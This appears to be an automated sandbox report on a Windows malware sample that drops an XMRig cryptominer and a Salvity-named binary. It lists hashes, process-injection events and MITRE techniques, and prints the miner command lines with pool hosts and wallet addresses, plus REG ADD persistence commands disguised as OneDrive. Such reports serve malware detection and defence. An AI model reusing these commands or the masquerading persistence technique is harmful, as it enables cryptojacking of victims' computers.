xmrig | b6a3b9630a6ed8f626b7fdc083c73a03c57923c1055314bacaa49031c5fa6ae3

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 08:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Size

5.6MB
MD5

d9079709c37a9977a75123a38cbd6660
SHA1

0f7af4f8fe342afc826d5b6a7ffb0c145b371c50
SHA256

b6a3b9630a6ed8f626b7fdc083c73a03c57923c1055314bacaa49031c5fa6ae3
SHA512

a6d3992a6842d4433d3ce46439b14e02de34929309263ff08d4e7a561a52210a886a146afc3579aa44c28a528fc798c6c615543a805212bc382e4e7141c842bd

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5036-165-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/5036-166-0x000000014034CF44-mapping.dmp	xmrig
behavioral2/memory/5036-167-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/5036-168-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig
behavioral2/memory/5036-170-0x0000000140000000-0x00000001407DD000-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

Processes:

[New]1.exeOneDrive.exe[New]Salvity_crypted(2).exe

pid process

768 [New]1.exe
2992 OneDrive.exe
4956 [New]Salvity_crypted(2).exe

pid	process
768	[New]1.exe
2992	OneDrive.exe
4956	[New]Salvity_crypted(2).exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3696-162-0x0000000140000000-0x0000000142B59000-memory.dmp	upx
behavioral2/memory/3696-164-0x0000000140000000-0x0000000142B59000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

OneDrive.exe

pid process

2992 OneDrive.exe

pid	process
2992	OneDrive.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

REG.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run	REG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"	REG.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ip-api.com
5 ipinfo.io

flow	ioc
22	ip-api.com
5	ipinfo.io

Suspicious use of SetThreadContext 4 IoCs

Processes:

[New]1.exe[New]Salvity_crypted(2).exeOneDrive.exe

description	pid	process	target process
PID 768 set thread context of 2504	768	[New]1.exe	AppLaunch.exe
PID 4956 set thread context of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 2992 set thread context of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 set thread context of 5036	2992	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

REG.exeREG.exe

pid process

5056 REG.exe
4424 REG.exe

pid	process
5056	REG.exe
4424	REG.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AppLaunch.exeOneDrive.exe

pid	process
2504	AppLaunch.exe
2504	AppLaunch.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe
2992	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

AppLaunch.execonhost.exe

description pid process

Token: SeDebugPrivilege 4536 AppLaunch.exe
Token: SeLockMemoryPrivilege 5036 conhost.exe
Token: SeLockMemoryPrivilege 5036 conhost.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

conhost.exe

pid process

5036 conhost.exe

pid	process
668

description	pid	process
Token: SeDebugPrivilege	4536	AppLaunch.exe
Token: SeLockMemoryPrivilege	5036	conhost.exe
Token: SeLockMemoryPrivilege	5036	conhost.exe

pid	process
5036	conhost.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

68e7a0fa9f7dbbb34bc4bad97690ea72.exe[New]1.exeAppLaunch.exe[New]Salvity_crypted(2).exeOneDrive.exe

description	pid	process	target process
PID 5020 wrote to memory of 768	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]1.exe
PID 5020 wrote to memory of 768	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]1.exe
PID 5020 wrote to memory of 768	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]1.exe
PID 768 wrote to memory of 2504	768	[New]1.exe	AppLaunch.exe
PID 768 wrote to memory of 2504	768	[New]1.exe	AppLaunch.exe
PID 768 wrote to memory of 2504	768	[New]1.exe	AppLaunch.exe
PID 768 wrote to memory of 2504	768	[New]1.exe	AppLaunch.exe
PID 768 wrote to memory of 2504	768	[New]1.exe	AppLaunch.exe
PID 2504 wrote to memory of 2992	2504	AppLaunch.exe	OneDrive.exe
PID 2504 wrote to memory of 2992	2504	AppLaunch.exe	OneDrive.exe
PID 2504 wrote to memory of 5056	2504	AppLaunch.exe	REG.exe
PID 2504 wrote to memory of 5056	2504	AppLaunch.exe	REG.exe
PID 2504 wrote to memory of 5056	2504	AppLaunch.exe	REG.exe
PID 2504 wrote to memory of 4424	2504	AppLaunch.exe	REG.exe
PID 2504 wrote to memory of 4424	2504	AppLaunch.exe	REG.exe
PID 2504 wrote to memory of 4424	2504	AppLaunch.exe	REG.exe
PID 5020 wrote to memory of 4956	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]Salvity_crypted(2).exe
PID 5020 wrote to memory of 4956	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]Salvity_crypted(2).exe
PID 5020 wrote to memory of 4956	5020	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	[New]Salvity_crypted(2).exe
PID 4956 wrote to memory of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 4956 wrote to memory of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 4956 wrote to memory of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 4956 wrote to memory of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 4956 wrote to memory of 4536	4956	[New]Salvity_crypted(2).exe	AppLaunch.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 3696	2992	OneDrive.exe	svchost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe
PID 2992 wrote to memory of 5036	2992	OneDrive.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\68e7a0fa9f7dbbb34bc4bad97690ea72.exe
"C:\Users\Admin\AppData\Local\Temp\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5020

C:\Users\Admin\AppData\Roaming\[New]1.exe
C:\Users\Admin\AppData\Roaming\[New]1.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQBZuEsYhQdC0eJyDaytj4QjfzlC1XcVmaMoUYS1XcFe8Sg3.Boba
5⤵
PID:3696

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u 45wBqXGMbXaX8NMdEUKLMehgJXU16Tc6Mi1tcmZdHvCPjXSD7xzE2VGjJmbbq4Mh7U5hs95LWWzfB9ZoUYYoYXGa9o1zH8G -p "Boba"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5036

C:\Windows\SysWOW64\REG.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
4⤵
- Adds Run key to start application
- Modifies registry key
PID:5056

C:\Windows\SysWOW64\REG.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
4⤵
- Modifies registry key
PID:4424

C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exe
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4536

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize
4KB

MD5
f7dcb24540769805e5bb30d193944dce

SHA1
e26c583c562293356794937d9e2e6155d15449ee

SHA256
6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

SHA512
cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize
340B

MD5
9265e18faf613b53a484849116992c56

SHA1
0cfe028224b0ab7165dcd56e9e853b0aac9137a4

SHA256
9c57b1d641b4a0160f5f62ac767f98a89e0f1c1679902d6b043226122f56f555

SHA512
1876edc68431190c1382832c05ce7ebb58c836d147c532653d0da4c788af53e88977bac831b11daeb26a5ec70d6b13eb0f428783cab4d2a641a3385d498d18e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\0F6QG06K4i2jeH_s
Filesize
233B

MD5
2ca3c0e2a78754c1c97bcebf1409c513

SHA1
92ca53ce14553ab4875fceb79421f9f1e740038b

SHA256
81e75ebb0ed07c375d4b37ba941321ae01f307f428198fe8aff860465879d39d

SHA512
7e18d166702d634885c7a0734c4f7c9f19a429e8c41eafd6f41326c8db786cb270b50fa94045adddd79f94bf73b2fc40ed2bdf6cee55fed5052054ad011f61af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Filesize
175KB

MD5
f3af73070387fb75b19286826cc3126c

SHA1
7774854137d7ada89f3b4bdf67631456a1e74853

SHA256
974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610

SHA512
a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dll
Filesize
316KB

MD5
fed6517a5f84eecc29edee5586d7feeb

SHA1
56df244bf73c7ec7b59c98e1f5d47b379b58a06b

SHA256
5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6

SHA512
45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dll
Filesize
316KB

MD5
fed6517a5f84eecc29edee5586d7feeb

SHA1
56df244bf73c7ec7b59c98e1f5d47b379b58a06b

SHA256
5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6

SHA512
45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642

Download Submit
C:\Users\Admin\AppData\Roaming\[New]1.exe
Filesize
211.8MB

MD5
353f4e062d724170670c180ebd99820b

SHA1
c97f5f21a9bf52876fd30e1c3254105f3d0acac8

SHA256
0333131dd30196be60dcc7bf5bd9f2c5070b06377653ac0748f7d28e9ddfd5b2

SHA512
d9de44f50021d39b98a48a99c046c4a427358ae9ec867cd62c53fff51ae6a335747aab813abfb71f0d9a64d76321c31e3e031b9c4899f40f004020f1889fb861

Download Submit
C:\Users\Admin\AppData\Roaming\[New]1.exe
Filesize
223.4MB

MD5
0f2e8a1d69c040f24c4c21dc8b365390

SHA1
17b4f6174c53e6efd153c9fe29e4170ed74a9baf

SHA256
86a1c77ac544648e7c7c6d7bed7c1e3a016d5b6cbc8ca558143321fcb5af4bf0

SHA512
9b36e54c7a99987ff342c902fcee3770c3708ab6121555deba4a054eaeea688d3e04e0aead13e08bb99fc643d6e13a7dbb07575aee800e0bcdebe0cbbc3b2cf9

Download Submit
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exe
Filesize
138.2MB

MD5
0eb8e4c1891bd0e29ea983719de3f2a0

SHA1
c44f9134d5df8ef90d6382db624c15a179d9c1bb

SHA256
7ec35f7110093b4f5c8916592d0a86cb180c8e845e6c3238674369d7cc6e2e6f

SHA512
eec59ee50b3bcdfdeb92ce51db931e701480bb8e6a9dee424c5dedb6bd2e392b414e46fc6cf26f3e9fd557f912399a7c09ca025f893ac16b71258011be81f099

Download Submit
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exe
Filesize
150.6MB

MD5
215aba8041ae5110f18339823faae566

SHA1
02d04e2ca8599de186bc63088c00e395b0624c05

SHA256
00fc243f61d287848e20eb9e4c2b4c91949c5fc40b8f35fd61519ad5fe30231f

SHA512
4036591f963150fffd2f63a00c2e75acf2aad226dc169d22fd339e9a3336ac7f011a3f97903b99f44639e3552ede50de835ebc4540541f81333d968609ed3331

Download Submit
memory/768-130-0x0000000000000000-mapping.dmp

Download
memory/2504-140-0x0000000000400000-0x00000000004CA000-memory.dmp

Filesize
808KB

Download
memory/2504-133-0x0000000000000000-mapping.dmp

Download
memory/2504-134-0x0000000000400000-0x00000000004CA000-memory.dmp

Filesize
808KB

Download
memory/2992-141-0x0000000000000000-mapping.dmp

Download
memory/3696-163-0x0000000142B56500-mapping.dmp

Download
memory/3696-164-0x0000000140000000-0x0000000142B59000-memory.dmp

Filesize
43.3MB

Download
memory/3696-162-0x0000000140000000-0x0000000142B59000-memory.dmp

Filesize
43.3MB

Download
memory/4424-146-0x0000000000000000-mapping.dmp

Download
memory/4536-154-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4536-153-0x0000000000000000-mapping.dmp

Download
memory/4536-159-0x00000000053F0000-0x0000000005456000-memory.dmp

Filesize
408KB

Download
memory/4536-160-0x0000000006430000-0x00000000069D4000-memory.dmp

Filesize
5.6MB

Download
memory/4536-161-0x0000000005F60000-0x0000000005FF2000-memory.dmp

Filesize
584KB

Download
memory/4956-150-0x0000000000000000-mapping.dmp

Download
memory/5036-167-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/5036-165-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/5036-166-0x000000014034CF44-mapping.dmp

Download
memory/5036-168-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/5036-169-0x0000019AFD980000-0x0000019AFD9A0000-memory.dmp

Filesize
128KB

Download
memory/5036-170-0x0000000140000000-0x00000001407DD000-memory.dmp

Filesize
7.9MB

Download
memory/5036-171-0x0000019AFF2A0000-0x0000019AFF2E0000-memory.dmp

Filesize
256KB

Download
memory/5036-172-0x0000019AFD9E0000-0x0000019AFDA00000-memory.dmp

Filesize
128KB

Download
memory/5036-173-0x0000019AFF2E0000-0x0000019AFF300000-memory.dmp

Filesize
128KB

Download
memory/5056-143-0x0000000000000000-mapping.dmp

Download